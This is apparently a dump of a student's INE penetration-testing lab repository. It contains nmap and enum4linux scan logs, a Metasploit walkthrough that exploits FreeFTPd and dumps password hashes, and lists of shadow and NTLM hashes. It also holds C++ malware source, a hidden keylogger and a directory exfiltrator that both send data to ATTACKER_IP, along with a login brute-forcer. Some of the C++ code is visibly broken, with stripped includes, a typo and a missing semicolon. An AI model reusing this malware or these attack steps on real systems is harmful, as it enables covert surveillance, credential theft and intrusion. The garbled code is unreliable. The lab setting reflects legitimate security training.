andreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:1070:1070::/home/andreas:/bin/sh 
akpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:1071:1071::/home/akpm:/bin/sh stephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:1072:1072::/home/stephen:/bin/sh password:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:1073:1073::/home/password:/bin/sh oliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:1074:1074::/home/oliver:/bin/sh blaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:1075:1075::/home/blaisorblade:/bin/sh roman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:1076:1076::/home/roman:/bin/sh postfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:1077:1077::/home/postfix:/bin/sh nathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:1078:1078::/home/nathan:/bin/sh karl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:1079:1079::/home/karl:/bin/sh jose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:1080:1080::/home/jose:/bin/sh feedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:1081:1081::/home/feedback:/bin/sh dev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:1082:1082::/home/dev:/bin/sh bryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:1083:1083::/home/bryan:/bin/sh bruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:1084:1084::/home/bruce:/bin/sh 
qmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:1085:1085::/home/qmailr:/bin/sh jamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:1086:1086::/home/jamie:/bin/sh derek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:1087:1087::/home/derek:/bin/sh brandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:1088:1088::/home/brandon:/bin/sh risks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:1089:1089::/home/risks:/bin/sh proberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:1090:1090::/home/proberts:/bin/sh pierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:1091:1091::/home/pierre:/bin/sh pgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:1092:1092::/home/pgo:/bin/sh maxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:1093:1093::/home/maxim:/bin/sh guest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:1094:1094::/home/guest:/bin/sh ================================================ FILE: ine-labs/bruteforce-and-password-cracking/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Sun Feb 21 14:10:57 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 192.168.99.22 Host is up (0.055s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) 23/tcp open telnet Linux telnetd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 192.168.99.100 Host is up (0.00018s latency). 
All 1000 scanned ports on 192.168.99.100 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 21 14:11:07 2021 -- 2 IP addresses (2 hosts up) scanned in 9.88 seconds

================================================
FILE: ine-labs/bruteforce-and-password-cracking/passwd
================================================

================================================
FILE: ine-labs/bruteforce-and-password-cracking/shadow
================================================

================================================
FILE: ine-labs/dirbuster/alive_hosts.txt
================================================
10.104.11.50
10.104.11.96
10.104.11.198

================================================
FILE: ine-labs/dirbuster/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 10.104.11.50
Host is up (0.00026s latency).
All 1000 scanned ports on 10.104.11.50 are closed

Nmap scan report for 10.104.11.96
Host is up (0.058s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 18 13:45:23 2021 -- 3 IP addresses (3 hosts up) scanned in 11.44 seconds

================================================
FILE: ine-labs/exploit-based-cpp/exploit.cpp
================================================
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include
#include
#include
#include
#include
#include
#define ATTACKER_IP ""

SOCKET InitServer()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    WSDATA wsaData;
    SOCKET server;      // the socket to connect to
    SOCKADDR_IN addr;   // holds connection details
    int result;

    // The WSAStartup function initiates use of the WS2_32.dll
    result = WSAStartup(MAKEWORD(2, 0), &WSAData);
    if (result != 0) {
        printf("WSAStartup failed with error code: %d\n", result);
        exit(result);
    }

    server = socket(AF_INET, SOCK_STREAM, 0); // establish TCP socket

    // manually add needed socket values; could instead use getaddrinfo()
    addr.sin_addr.s_addr = inet_addr(ATTACKER_IP);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555);

    result = connect(server, (SOCKADDR *)&addr, sizeof(addr));
    if (result = SOCKET_ERROR)
        server = INVALID_SOCKET;

    return server;
}

char *GetUserDirectory()
{
    char *pPath = getenv("USERPROFILE");
    if (pPath == NULL) {
        perror("getenv");
        exit(1);
    }
    return pPath;
}

void SendData(SOCKET sockfd, char *buf)
{
    int result = send(sockfd, buf, (int) strlen(buf), 0);
    if (result == SOCKET_ERROR) {
        printf("send failed: %d\n", WSAGetLastError());
        closesocket(server);
        WSACleanup();
        exit(1);
    }
}

int SendUserDirectory(SOCKET sockfd, const char *dirname)
{
    DIR *dirp;
    struct dirent *entry;

    dirp = opendir(dirname);
    errno = 0;
    while ((entry = readdir(dirp)) != NULL) {
        SendData(sockfd, entry->d_name, (int) strlen(entry->d_name), 0);
    }

    // When an error is encountered, a null pointer is returned and errno
    // is set to indicate the error. When the end of the directory
    // is encountered, a null pointer is returned and errno is not changed.
    return errno;
}

int main()
{
    SOCKET server;
    char *pPath = GetUserDirectory();

    server = InitServer();
    if (server == INVALID_SOCKET) {
        printf("Failed to connect!\n");
        closesocket(server);
        WSACleanup();
        return 1;
    }

    SendData(server, pPath);
    SendUserDirectory(server, pPath); // TODO error check

    closesocket(server);
    WSACleanup();
    return 0;
}

================================================
FILE: ine-labs/exploit-based-cpp/keylogger.cpp
================================================
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include
#include
#include
#include
#define ATTACKER_IP "10.0.2.15"

int main()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY;
    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;

    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr(ATTACKER_IP)
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555);
    connect(server, (SOCKADDR *)&addr, sizeof(addr));

    // collect the pressed keys
    while (true) {
        Sleep(10); // pause for 10 milliseconds

        // check if this is a printable key (keycodes defined by Microsoft)
        for (int KEY = 0x8; KEY < 0xFF; KEY++) {
            if (GetAsyncKeyState(KEY) == -32767) {// if key was pressed
                char buffer[2];
                buffer[0] = KEY;
                send(server, buffer, sizeof(buffer), 0);
            }
        }
    }

    // cleanup
    closesocket(server);
    WSACleanup();
}

================================================
FILE: ine-labs/metasploit/README.md
================================================
# Metasploit Lab

## Description

In this lab, you will have to use Metasploit and meterpreter against a real machine; this will help you become familiar with the Metasploit framework and its features.
## Goals

- Identify the target machine on the network
- Find a vulnerable service
- Exploit the service by using Metasploit to get a meterpreter session
- Gather information from the machine by using meterpreter commands
- Retrieve the password hashes from the exploited machine
- Search for a file named "Congrats.txt"

## Recon

After connecting to the Hera Lab VPN, it is time to search for a vulnerable target. I used nmap for this:

```
$ nmap -sV -oN nmap_scan.txt 192.168.99.100/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 12:43 EST
Nmap scan report for 192.168.99.12
Host is up (0.059s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFTPd 1.0
22/tcp   open  ssh           WeOnlyDo sshd 2.1.8.98 (protocol 2.0)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
```

From the scan we see that the IP address 192.168.99.12 has several services running on it. Time to open up Metasploit and determine which service is vulnerable to exploitation.

## Vulnerability Assessment

Searching for the FreeFTPd service in msfconsole yields the following results:

```
msf6 > search FreeFTPd 1.0

Matching Modules
================

   #  Name                                       Disclosure Date  Rank     Check  Description
   -  ----                                       ---------------  ----     -----  -----------
   0  exploit/windows/ftp/freeftpd_pass          2013-08-20       normal   Yes    freeFTPd PASS Command Buffer Overflow
   1  exploit/windows/ftp/freeftpd_user          2005-11-16       average  Yes    freeFTPd 1.0 Username Overflow
   2  exploit/windows/ssh/freeftpd_key_exchange  2006-05-12       average  No     FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
```

I chose the first exploit since it has the most recent disclosure date and higher rank. I left the default payload as windows/meterpreter/reverse_tcp shell.

The only options we need to change are the remote and local hosts:

```
set RHOSTS 192.168.99.12
set LHOST 192.168.99.100
```

## Exploitation

Run the exploit to spawn a meterpreter session.

### Cracking hashes

Once inside meterpreter, run the hashdump command:

```
meterpreter> hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2:::
ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
```

I copied the output to a file named hashdump.txt and fed it to john:

```
$ john hashdump.txt
```

### Escalate Privileges

We can escalate our privileges with the getsystem command:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### Print Congrats.txt

The Congrats.txt file can easily be found with the search command:

```
meterpreter > search -f Congrats.txt
Found 1 result...
    c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt (64 bytes)
meterpreter > cat "c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt"
Congratulations! You have successfully exploited this machine!
``` ## Install a Backdoor ================================================ FILE: ine-labs/metasploit/hashdump.txt ================================================ Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2::: ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0::: ================================================ FILE: ine-labs/metasploit/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Tue Feb 23 12:43:57 2021 as: nmap -sV -oN nmap_scan.txt 192.168.99.100/24 Nmap scan report for 192.168.99.12 Host is up (0.059s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp FreeFTPd 1.0 22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Nmap scan report for 192.168.99.100 Host is up (0.00030s latency). All 1000 scanned ports on 192.168.99.100 are closed Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
# Nmap done at Tue Feb 23 12:44:13 2021 -- 256 IP addresses (2 hosts up) scanned in 15.93 seconds ================================================ FILE: ine-labs/nessus/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Thu Feb 18 12:17:44 2021 as: nmap -A -oN nmap_scan.txt 192.168.99.70/24 Nmap scan report for 192.168.99.50 Host is up (0.055s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds MAC Address: 00:50:56:A2:64:C8 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/18%OT=135%CT=1%CU=40956%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=602EA184%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II= OS:I%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4 OS:=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF% OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC OS:=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A= OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NN OS:S%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=) OS:T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z) Network Distance: 1 hop Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 4h08m16s, deviation: 5h39m25s, median: 8m15s |_nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:64:c8 (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer 
name: els-winxp | NetBIOS computer name: ELS-WINXP\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-02-18T09:26:26-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 54.90 ms 192.168.99.50 Nmap scan report for 192.168.99.70 Host is up (0.000048s latency). All 1000 scanned ports on 192.168.99.70 are closed Too many fingerprints match this host to give specific OS details Network Distance: 0 hops OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Feb 18 12:19:02 2021 -- 256 IP addresses (2 hosts up) scanned in 78.85 seconds ================================================ FILE: ine-labs/null-session/Congratulations.txt ================================================ Congratulations! You have successfully exploited a null session! ================================================ FILE: ine-labs/null-session/alive_hosts.txt ================================================ 192.168.99.100 192.168.99.162 ================================================ FILE: ine-labs/null-session/enum4linux_scan.txt ================================================ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 21 17:22:35 2021 ========================== | Target Information | ========================== Target ........... 192.168.99.162 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.99.162 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.99.162 | ============================================== Looking up status of 192.168.99.162 ELS-WINXP <00> - B Workstation Service WORKGROUP <00> - B Domain/Workgroup Name ELS-WINXP <20> - B File Server Service WORKGROUP <1e> - B Browser Service Elections WORKGROUP <1d> - B Master Browser ..__MSBROWSE__. <01> - B Master Browser MAC Address = 00-50-56-A0-46-C7 ======================================= | Session Check on 192.168.99.162 | ======================================= [+] Server 192.168.99.162 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.99.162 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================== | OS information on 192.168.99.162 | ======================================== [+] Got OS info for 192.168.99.162 from smbclient: [+] Got OS info for 192.168.99.162 from srvinfo: 192.168.99.162 Wk Sv NT PtB LMB platform_id : 500 os version : 5.1 server type : 0x51003 =============================== | Users on 192.168.99.162 | =============================== index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null) index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null) index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x5 RID: 0x3e8 acb: 
0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null) index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service user:[Administrator] rid:[0x1f4] user:[eLS] rid:[0x3eb] user:[Frank] rid:[0x3ed] user:[Guest] rid:[0x1f5] user:[HelpAssistant] rid:[0x3e8] user:[netadmin] rid:[0x3ec] user:[SUPPORT_388945a0] rid:[0x3ea] =========================================== | Share Enumeration on 192.168.99.162 | =========================================== Sharename Type Comment --------- ---- ------- My Documents Disk IPC$ IPC Remote IPC Frank Disk C Disk WorkSharing Disk FrankDocs Disk ADMIN$ Disk Remote Admin C$ Disk Default share Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- [+] Attempting to map shares on 192.168.99.162 //192.168.99.162/IPC$ Mapping: OK Listing: DENIED //192.168.99.162/Frank Mapping: OK Listing: DENIED //192.168.99.162/C [E] Can't understand response: AUTOEXEC.BAT A 0 Thu Feb 12 19:50:47 2015 boot.ini HS 211 Thu Feb 12 19:46:17 2015 CONFIG.SYS A 0 Thu Feb 12 19:50:47 2015 Documents and Settings D 0 Wed Feb 18 04:25:58 2015 IO.SYS AHSR 0 Thu Feb 12 19:50:47 2015 MSDOS.SYS AHSR 0 Thu Feb 12 19:50:47 2015 NTDETECT.COM AHSR 47564 Tue Aug 3 13:08:34 2004 ntldr AHSR 250032 Tue Aug 3 13:29:34 2004 pagefile.sys AHS 805306368 Sun Feb 21 23:01:08 2021 Program Files DR 0 Mon Oct 3 12:10:27 2016 System Volume Information DHS 0 Thu Feb 12 19:54:12 2015 WINDOWS D 0 Mon Oct 3 12:12:49 2016 785224 blocks of size 4096. 
304467 blocks available //192.168.99.162/WorkSharing Mapping: OK, Listing: OK //192.168.99.162/FrankDocs Mapping: OK Listing: DENIED //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A //192.168.99.162/C$ Mapping: DENIED, Listing: N/A ====================================================== | Password Policy Information for 192.168.99.162 | ====================================================== [+] Attaching to 192.168.99.162 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:192.168.99.162) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] ELS-WINXP [+] Builtin [+] Password Info for Domain: ELS-WINXP [+] Minimum password length: None [+] Password history length: None [+] Maximum password age: 42 days 22 hours 47 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 0 ================================ | Groups on 192.168.99.162 | ================================ [+] Getting builtin groups: group:[Administrators] rid:[0x220] group:[Backup Operators] rid:[0x227] group:[Guests] rid:[0x222] group:[Network Configuration Operators] rid:[0x22c] group:[Power Users] rid:[0x223] group:[Remote Desktop Users] rid:[0x22b] group:[Replicator] rid:[0x228] group:[Users] rid:[0x221] [+] Getting builtin group memberships: Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin Group 
'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin Group 'Users' (RID: 545) has member: ELS-WINXP\Frank Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest [+] Getting local groups: group:[HelpServicesGroup] rid:[0x3e9] [+] Getting local group memberships: Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0 [+] Getting domain groups: group:[None] rid:[0x201] [+] Getting domain group memberships: Group 'None' (RID: 513) has member: ELS-WINXP\Administrator Group 'None' (RID: 513) has member: ELS-WINXP\Guest Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0 Group 'None' (RID: 513) has member: ELS-WINXP\eLS Group 'None' (RID: 513) has member: ELS-WINXP\netadmin Group 'None' (RID: 513) has member: ELS-WINXP\Frank ========================================================================= | Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-21-823518204-2025429265-839522115 [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password '' [+] Enumerating users using SID S-1-5-32 and logon username '', password '' =============================================== | Getting printer info for 192.168.99.162 | =============================================== No printers returned. 
enum4linux complete on Sun Feb 21 17:25:39 2021 ================================================ FILE: ine-labs/null-session/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Sun Feb 21 17:08:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 192.168.99.100 Host is up (0.00023s latency). All 1000 scanned ports on 192.168.99.100 are closed Nmap scan report for 192.168.99.162 Host is up (0.058s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 21 17:08:41 2021 -- 2 IP addresses (2 hosts up) scanned in 8.95 seconds ================================================ FILE: ine-labs/practice/hello.php ================================================ Test PHP Hello World!

'; ?> ================================================ FILE: ine-labs/practice/index.html ================================================ Test PHP

Welcome to my custom web server!

================================================
FILE: ine-labs/practice/my-ls.sh
================================================
#!/bin/bash

# Iterate with a glob instead of $(ls) so names containing spaces stay intact.
for i in *; do
    echo "item: $i"
done

================================================
FILE: ine-labs/practice/script.sh
================================================
#!/bin/bash

x=444
y=321

# Compare the two integers and report the relation between them.
if [ "$x" -eq "$y" ]; then
    echo "The values are equal!"
elif [ "$x" -lt "$y" ]; then
    echo "$x is less than $y"
else
    echo "$x is greater than $y"
fi

================================================
FILE: ine-labs/practice/sequences.sh
================================================
#!/bin/bash

echo "Two ways to iterate over a sequence of numbers!"

echo "option 1: use the seq command"
for i in $(seq 1 10); do
    echo "$i"
done

echo "option 2: use built-in braces {1..10}"
for i in {1..10}; do
    echo "$i"
done

================================================
FILE: ine-labs/practice/shell.php
================================================
Simple PHP Shell
================================================ FILE: ine-labs/python-assisted-exploitation/brute-forcer.py ================================================ from bs4 import BeautifulSoup import requests def get_html(url): response = requests.get(url) html = response.text return html def parse_ids(html, id_name): """ Given HTML code, returns a list of values that have the id `id_name`. """ result = [] soup = BeautifulSoup(html, "html.parser") for item in soup.find_all(id=id_name): result.append(item.contents[0]) # Remove an duplicate entries result = list(set(result)) return result def attack(): # Scrape website for employee names and departments html = get_html("http://172.16.120.120") target = "http://172.16.120.120/admin.php" names = parse_ids(html, "name") departments = parse_ids(html, "department") # Attempt to login to "Admin Area" with name:department credential pair for name in names: for department in departments: response = requests.get(target, auth=(name, department)) if response.status_code != 401: print(f"Found successful login {name}:{department}") return if __name__ == "__main__": attack() ================================================ FILE: 